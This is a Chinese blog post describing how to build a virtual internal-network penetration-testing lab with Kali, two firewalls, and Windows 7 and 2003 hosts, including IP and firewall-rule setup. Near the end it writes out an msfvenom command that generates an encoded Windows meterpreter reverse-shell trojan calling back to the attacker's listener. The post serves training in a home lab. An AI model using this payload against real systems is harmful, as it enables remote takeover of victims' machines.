真实内网环境搭建
前言
最近学习了内网的一些知识,学会了域的创建,域渗透以及内网渗透方面的知识,这里就简单给大家介绍一下真实内网环境的搭建过程。
靶机的准备
这里需要5台机器,分别是kali+2台防火墙+2台服务器(内网机器)其中防火墙可以去网上下载。或者可以去我的资源那里下载。其中的话,就需要3张网卡了,VM1,VM2,VM8,其中VM1和VM2是仅主机模式,VM8是NAT模式。
靶机的网卡设置如下:
网卡设置:
kali(VM1)192.168.101.102
防火墙1
外网:192.168.231.131
内网:192.168.101.1
防火墙2
外网:192.168.231.132
内网:192.168.102.1
win7(VM2):
192.168.102.102
win03(VM2):
192.168.102.103
接下来,我们打开所有的靶机,进行配置环境
在网络编辑器里,进行编译网卡信息。
现在我创建好了VM2的虚拟机,其中的VM1和VM2不用勾选DHCP,让他自动获取ip
接下来,就是配置防火墙的一些配置信息了,让主机可以访问到防火墙的内网和外网的ip我们打开防火墙1,进行配置信息,这里由于在虚拟机中配置了防火墙,对网络起到一定的中断作用,所以主机一直上不了网,我只能用手机拍一些图片给大家配置一下。这里的防火墙2就直接克隆一份就行了。
这是防火墙打开时的初始化配置,我们需要配置le0,le1网卡,分别是内网和外网的网卡。我们还要配置ip地址。
我们就相当于配置好了防火墙1的ip地址,接下来我们配置防火墙2的地址。
当我们的ip没有得到更新的时候,我们可以刷新一下网卡,在cmd上输入ipconfig /release,然后在输入ipconfig /renew。
我们访问防火墙的外网ip,修改一些规则信息,将WAN一些禁止网络流量通过的选项去取勾选,选为任意流量都可以通过。
将其中的TCP修改为any
保存,退出页面
一定要点击Apply changes才会生效
我们添加外网的4444端口开放,使得win7可以访问kali的4444端口,也就是防火墙的外网ip:192.168.231.131:4444
我们在win7进行访问kali的4444端口
192.168.231.131:4444
我们先用msf生成一个木马程序,将他放入win7中执行,命令如下:
木马的生成
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.131 lport=4444 -a x86 --platform windows -b “\x00\xff” -e x86 /shikata_ga_nai -f exe > msf.exe
(其中的-p是payload的木马,-a是平台架构,-b是避开字符,-e是字符编码)
我们打开kali的4444端口进行监听
python -m SimpleHTTPServer 4444
我们打开msf,进行反弹shell
这里的木马程序如何放入,就需要开始时外网渗透获取的getshell后,进行上传程序,然后在终端执行即可。
后记
好了,真实的内网环境就搭建好了,由于篇幅较长,就不介绍接下来的攻击流程了,下一篇文章,我们重点讲一下,Pivoting跳板攻击与自动路由的配置流程,用于访问内网的页面至关重要,大家好好复习一下吧。
4032
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
